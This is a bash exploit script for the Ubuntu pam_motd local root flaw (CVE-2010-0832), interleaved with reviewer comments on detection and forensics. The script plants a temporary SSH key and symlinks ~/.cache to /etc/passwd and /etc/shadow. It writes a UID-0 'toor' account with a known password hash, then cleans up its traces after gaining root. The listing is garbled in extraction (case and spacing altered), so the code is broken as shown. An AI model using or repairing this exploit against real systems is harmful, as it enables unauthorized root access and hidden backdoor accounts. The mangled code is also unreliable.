#! /Bin/bash
#
# Exploit Title: Ubuntu pam motd local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
# User @ ubuntu :~ $ Bash ubuntu-pam-motd-localroot.sh
# [*] Ubuntu pam motd local root
# [*] Backuped/home/user/. ssh/authorized_keys
# [*] SSH key set up
# [*] Backuped/home/user/. cache
# [*] Spawn ssh
# [+] Owned:/etc/passwd
# [*] Spawn ssh
# [+] Owned:/etc/shadow
# [*] Restored/home/user/. cache
# [*] Restored/home/user/. ssh/authorized_keys
# [*] SSH key removed
# [+] Success! Use password toor to get root
# Password:
# Root @ ubuntu:/home/user # id
# Uid = 0 (root) gid = 0 (root) groupes = 0 (root)
#
# NOTE(review): the text of this listing appears to have been mangled in
# extraction (letter case and spacing altered), so it is not valid shell as
# shown. The comments describe only what the visible lines indicate.
#
# P: a passwd-format record for an account named "toor" with UID 0 and GID 0.
# Defender's check: any account other than root with UID 0 is an indicator,
# e.g.  awk -F: '$3 == 0 {print $1}' /etc/passwd
P = toor: x: 0: 0: root:/bin/bash
# S: the matching shadow-format record, carrying a $6$-prefixed crypt hash.
# The header comments give the password for this account as "toor".
S = toor: $6 $ tPuRrLW7 $ m0BvNoYS9FEF9/Lzv6PQospujOKt0giv. Small. VZwCcEcYQU5q2DLX. cI7NQtsNz1: 14798: 0: 99999: 7 :::
Echo "[*] Ubuntu pam motd local root"
# Preconditions, checked before anything is modified: ssh and ssh-keygen must
# be found by `which`, and an sshd process owned by root must be running.
# Each failed check prints a "[-] ... is a requirement" message and exits 1.
# NOTE(review): sshd is only the login path this script happens to use; its
# absence on a host is not evidence that other PAM-enabled logins are
# unaffected. The remedy is the package update named in the header.
[-Z "$ (which ssh)"] & echo "[-] ssh is a requirement" & exit 1
[-Z "$ (which ssh-keygen)"] & echo "[-] ssh-keygen is a requirement" & exit 1
[-Z "$ (ps-u root | grep sshd)"] & echo "[-] a running sshd is a requirement" & exit 1
# Backup <path>: set the file or directory in $1 aside as "$1.bak".
# As far as the visible lines show: an older "$1.bak" is deleted first, a
# missing $1 is treated as success (return 0), a failed move returns 1, and a
# "[*] Backuped <path>" line is printed once the move has happened.
# Forensic note: a leftover "<path>.bak" next to ~/.cache or
# ~/.ssh/authorized_keys is an artifact of an interrupted run.
Backup (){
[-E "$1"] & [-e "$1". bak] & rm-rf "$1". bak
[-E "$1"] | return 0
Mv "$1" {,. bak} | return 1
Echo "[*] Backuped $1"
}
# Restore <path>: counterpart of Backup; puts "$1.bak" back in place of $1.
# As far as the visible lines show: whatever currently sits at $1 is removed,
# a missing "$1.bak" is treated as success (return 0), a failed move returns 1,
# and a "[*] Restored <path>" line is printed after the move.
# NOTE(review): $1 is removed before the existence of "$1.bak" is checked, so
# when no backup exists the path simply ends up deleted.
Restore (){
[-E "$1"] & rm-rf "$1"
[-E "$1". bak] | return 0
Mv "$1" {. bak,} | return 1
Echo "[*] Restored $1"
}
# Key_create: arrange a password-less SSH login for the current user.
# As far as the visible lines show: the existing ~/.ssh/authorized_keys is set
# aside via Backup, ssh-keygen writes a new RSA key pair at the path in $KEY
# (the key comment appears to be "pam"), ~/.ssh is created if missing, and the
# new public key is moved into place as ~/.ssh/authorized_keys.
# Any failing step returns 1; success prints "[*] SSH key set up".
# Detection: an authorized_keys file that briefly holds a single key, an
# authorized_keys.bak beside it, and (typically) an sshd log entry for a
# public-key login by this user from the loopback address.
Key_create (){
Backup ~ /. Ssh/authorized_keys
Ssh-keygen-q-t rsa-N-C pam-f "$ KEY" | return 1
[! -D ~ /. Ssh] & {mkdir ~ /. Ssh | return 1 ;}
Mv "$ KEY. pub "~ /. Ssh/authorized_keys | return 1
Echo "[*] SSH key set up"
}
# Key_remove: undo Key_create. Deletes the private key file at $KEY, puts the
# user's original ~/.ssh/authorized_keys back via Restore, and prints
# "[*] SSH key removed".
# Forensic note: after this runs, the temporary key no longer exists on disk,
# so evidence of the loopback login has to come from logs rather than files.
Key_remove (){
Rm-f "$ KEY"
Restore ~ /. Ssh/authorized_keys
Echo "[*] SSH key removed"
}
# Own <path>: the step tied to the pam motd issue named in the header.
# As far as the visible lines show: ~/.cache is removed and recreated as a
# symbolic link to the path in $1, an ssh session to localhost is started with
# the temporary key and runs only `true`, and the function then tests whether
# $1 has become writable for the calling user. If it has not, it prints
# "[-] Own $1 failed", calls restore on ~/.cache and leaves through bye;
# otherwise it prints "[+] owned: <path>".
# NOTE(review): nothing here modifies $1 directly before the writability test,
# so any permission change must come from the root-privileged login path. That
# is consistent with the public description of CVE-2010-0832 (pam_motd acting
# on a ~/.cache symlink); confirm against the vendor advisory.
# Detection: ~/.cache existing as a symlink, especially one pointing at a file
# under /etc, and an unexpected owner on /etc/passwd or /etc/shadow.
# Mitigation: the libpam package update given under "Patch Instructions".
Own (){
[-E ~ /. Cache] & rm-rf ~ /. Cache
Ln-s "$1 "~ /. Cache | return 1
Echo "[*] spawn ssh"
Ssh-o NoHostAuthenticationForLocalhost yes-I "$ KEY" localhost true
[-W "$1"] | {echo "[-] Own $1 failed"; restore ~ /. Cache; bye ;}
Echo "[+] owned: $1"
}
# Bye: failure exit path. Runs Key_remove (delete the temporary key, restore
# authorized_keys) and terminates the script with status 1.
# NOTE(review): ~/.cache is not restored here; callers that need it restored
# do so themselves before calling bye.
Bye (){
Key_remove
Exit 1
}
# Main sequence, as far as the visible lines show.
#
# KEY is a path name obtained from mktemp with -u, which prints a name without
# creating the file; ssh-keygen later creates the private key at that path.
KEY = "$ (mktemp-u )"
# Install the temporary key; abort if that fails.
Key_create | {echo "[-] Failed to setup SSH key"; exit 1 ;}
# Set the user's real ~/.cache aside so it can be put back afterwards.
Backup ~ /. Cache | {echo "[-] Failed to backup ~ /. Cache "; bye ;}
# For each of /etc/passwd and /etc/shadow: call Own on the file, then redirect
# the prepared "toor" record (P or S) into it.
# Detection: a "toor" line or any second UID-0 account in /etc/passwd, and a
# change of owner or modification time on either file. An audit watch such as
#   auditctl -w /etc/passwd -p wa   (and the same for /etc/shadow)
# records both the attribute change and the write.
Own/etc/passwd & echo "$ P">/etc/passwd
Own/etc/shadow & echo "$ S">/etc/shadow
# Put the user's ~/.cache and authorized_keys back and delete the temporary key.
Restore ~ /. Cache | {echo "[-] Failed to restore ~ /. Cache "; bye ;}
Key_remove
Echo "[+] Success! Use password toor to get root"
# Final step: su to the toor account and, in that UID-0 session, delete the
# toor lines from passwd and shadow, hand both files back to root, set the
# group of /etc/shadow to shadow, ask nscd to invalidate its passwd cache
# (output discarded), and start bash.
# Forensic note: because this cleanup restores ownership and removes the added
# lines, inspecting /etc/passwd and /etc/shadow afterwards may show nothing.
# Rely on authentication logs (loopback public-key login, su to "toor"), file
# change times, and audit records instead.
Su-c "sed-I/toor:/d/etc/{passwd, shadow}; chown root:/etc/{passwd, shadow };
Chgrp shadow/etc/shadow; nscd-I passwd>/dev/null 2> & 1; bash "toor